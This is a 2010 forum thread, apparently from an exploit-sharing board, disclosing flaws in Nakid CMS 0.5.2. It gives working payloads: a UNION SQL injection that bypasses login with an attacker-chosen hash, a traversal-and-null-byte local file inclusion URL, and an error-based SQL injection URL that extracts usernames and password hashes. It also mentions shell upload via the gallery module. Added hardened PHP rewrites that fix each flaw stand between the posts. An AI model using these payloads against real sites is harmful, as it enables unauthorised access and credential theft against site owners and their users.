View full version: Nakid CMS 0.5.2


geezer.code
20.03.2010, 13:46
NakidCMS 0.5.2

Authentication bypass && Blind SQLi
login_process.php
mq=off (magic_quotes_gpc disabled)

$post_username = $_POST['username'];          // taken verbatim, no escaping
$post_password = md5($_POST['password']);
// the raw username is concatenated into the SQL string, so with
// magic_quotes off a quote in the input changes the statement structure
$users_query = mysql_query("SELECT id,password FROM ".$system_table_prefix."users WHERE username = '".$post_username."' LIMIT 1") or die("<p class='error'>Error: ".mysql_error()."</p>");
if(mysql_num_rows($users_query)<1){
    die("<p class='error'>No such user found</p>");
}
$users_array = mysql_fetch_array($users_query);
// the hash is compared against whatever row the query returned,
// including a UNION-supplied row whose hash the client chose itself
if($post_password != $users_array['password']){
    die("<p class='error'>Invalid Password</p>");
}
$_SESSION['uid'] = $users_array['id'];
echo("Redirecting to home page, if you are not redirected <a href='index.php'>click here</a>");
redirect_page("index.php?p=home");

Exploit:

index.php?p=login_process
POST
username=' union select 1 id,'9003d1df22eb4d3820015070385194c8' password#
password=pwd


P.S.
Shell upload via the gallery module.
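For comparison with the login logic quoted above, here is a hardened counterpart. This is an added example, not code from Nakid CMS; it assumes a PDO handle `$pdo`, that the `password` column stores `password_hash()` output instead of unsalted MD5, and it reuses the page's `$system_table_prefix` variable and `redirect_page()` name.

```php
<?php
// Added example (not Nakid CMS code): hardened replacement for login_process.php.
// Assumptions: $pdo is a connected PDO instance, $system_table_prefix is a
// trusted configuration value, and `password` holds password_hash() output.
session_start();

function authenticate(PDO $pdo, string $table_prefix, string $username, string $password): ?int
{
    // The username is bound as a parameter, never concatenated into the SQL,
    // so a quote or UNION in the input cannot alter the statement. Only the
    // table prefix (configuration, not user input) is interpolated.
    $stmt = $pdo->prepare(
        "SELECT id, password FROM {$table_prefix}users WHERE username = ? LIMIT 1"
    );
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false) {
        // Unknown user: run a verify against a throwaway hash so the response
        // time resembles the known-user path, then fail generically.
        static $dummy_hash = null;
        if ($dummy_hash === null) {
            $dummy_hash = password_hash('not-a-real-password', PASSWORD_DEFAULT);
        }
        password_verify($password, $dummy_hash);
        return null;
    }

    // password_verify does a constant-time comparison against the stored hash,
    // and the hash comes from the database row, never from the request.
    if (!password_verify($password, $row['password'])) {
        return null;
    }
    return (int) $row['id'];
}

$uid = authenticate(
    $pdo,
    $system_table_prefix,
    (string) ($_POST['username'] ?? ''),
    (string) ($_POST['password'] ?? '')
);

if ($uid === null) {
    // One generic message for both "no such user" and "wrong password",
    // so the login form does not confirm which usernames exist.
    die("<p class='error'>Invalid username or password</p>");
}

// Fresh session id on privilege change, then the same redirect as the original.
session_regenerate_id(true);
$_SESSION['uid'] = $uid;
echo("Redirecting to home page, if you are not redirected <a href='index.php'>click here</a>");
redirect_page("index.php?p=home");
```

The bypass in the post works because the original compares the submitted hash against whatever row the query returns, and the query shape is attacker-controlled. Binding the username removes the second half of that; taking the hash only from a row the database selected by username removes the first.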

RulleR
20.03.2010, 15:41
Local File Inclusion

Vuln file: /index.php
Included file: /includes/php/first.php
/*...*/
//Get Current Page
if(!empty($_GET['p'])){
    $core['page'] = strtolower($_GET['p']);       // no character filtering
}
if(!empty($_GET['pt'])){
    $core['page_type'] = strtolower($_GET['pt']);
}
/*...*/
if($core['page_type'] == "core"){
    // p is placed into the path as-is, so "../" sequences walk out of
    // includes/pages and a %00 byte cuts off the ".php" suffix
    $page_string = "includes/pages/".$core['page'].".php";
    if(file_exists($page_string)){
        include($page_string);
        $page_found = true;
    }
}
/*...*/
Need: magic_quotes = off
Exploit:
http://[host]/[path]/index.php?pt=core&p=../../../../../../../[local_file]%00

Blind SQL injection

Vuln file: /includes/pages/users_data.php
/*...*/
$page = $_GET['page']; //Requested page
$limit = $_GET['rows']; //Num of rows
$sidx = $_GET['sidx']; //Sort by
$sord = $_GET['sord']; //Sort order
/*...*/
$SQL = "SELECT * FROM ".$core['table_prefix']."users";
/*...*/
if(!empty($sidx)){
    // sort column and direction are appended unvalidated; ORDER BY cannot
    // be escaped with quotes, so this is a direct injection point
    $SQL .= " ORDER BY ".$sidx." ".$sord;
}
/*...*/
Exploit:
http://[host]/[path]/includes/pages/users_data.php?sidx=1+and+(1,2)=(select+*+from(select+name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1),name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1))x)
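Hardened versions of both routines quoted in this post, added here as an example rather than taken from Nakid CMS. Assumed names: the `$core` array, the `p`/`pt`/`sidx`/`sord`/`page`/`rows` query parameters from the post, the `includes/pages/` directory, a PDO handle `$pdo`, and a column list for the users table that the page does not show.

```php
<?php
// Added example (not Nakid CMS code): safe page dispatch and safe ORDER BY.
// Assumptions: this file lives next to includes/pages/, $pdo is a connected
// PDO instance, and $core['table_prefix'] is a trusted configuration value.

function resolve_core_page(string $requested): ?string
{
    // Only a plain page name is accepted: letters, digits, underscore, hyphen.
    // "../", "/" and NUL bytes all fail this test, so neither directory
    // traversal nor %00 truncation of the ".php" suffix can reach include().
    if (!preg_match('/^[a-z0-9_-]{1,64}$/', $requested)) {
        return null;
    }
    $base = realpath(__DIR__ . '/includes/pages');
    $path = realpath($base . '/' . $requested . '.php');
    // Second line of defence: the resolved path must still sit inside the
    // pages directory even if the pattern above is ever loosened.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function build_users_query(string $table_prefix, string $sidx, string $sord,
                           int $page, int $rows): array
{
    // ORDER BY identifiers cannot be bound as parameters, so user input is
    // mapped onto a fixed whitelist instead of being concatenated.
    $allowed_columns = ['id', 'username', 'email'];   // assumed column set
    $column    = in_array($sidx, $allowed_columns, true) ? $sidx : 'id';
    $direction = strtoupper($sord) === 'DESC' ? 'DESC' : 'ASC';
    // Clamp paging values so they cannot be used for resource exhaustion.
    $rows   = max(1, min($rows, 100));
    $offset = max(0, $page - 1) * $rows;
    $sql = "SELECT id, username FROM {$table_prefix}users "
         . "ORDER BY {$column} {$direction} LIMIT ? OFFSET ?";
    return [$sql, [$rows, $offset]];
}

// Page dispatch, replacing the include() shown in the post.
$page_found = false;
if (($core['page_type'] ?? '') === 'core') {
    $page_string = resolve_core_page(strtolower((string) ($_GET['p'] ?? '')));
    if ($page_string !== null) {
        include $page_string;
        $page_found = true;
    }
}

// users_data.php listing, replacing the string-built ORDER BY.
[$sql, $params] = build_users_query(
    $core['table_prefix'],
    (string) ($_GET['sidx'] ?? 'id'),
    (string) ($_GET['sord'] ?? 'asc'),
    (int) ($_GET['page'] ?? 1),
    (int) ($_GET['rows'] ?? 20)
);
$stmt = $pdo->prepare($sql);
// LIMIT/OFFSET must be bound as integers; with emulated prepares a string
// value would be quoted and produce a syntax error.
$stmt->bindValue(1, $params[0], PDO::PARAM_INT);
$stmt->bindValue(2, $params[1], PDO::PARAM_INT);
$stmt->execute();
$users = $stmt->fetchAll(PDO::FETCH_ASSOC);
```

The exploit URL in the post requests `includes/pages/users_data.php` directly rather than through `index.php`, so besides the query fix the file also needs the same session and authorisation check the front controller applies; that check is application-specific and is not shown here.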

Jokester
23.04.2010, 16:10
PoC leaked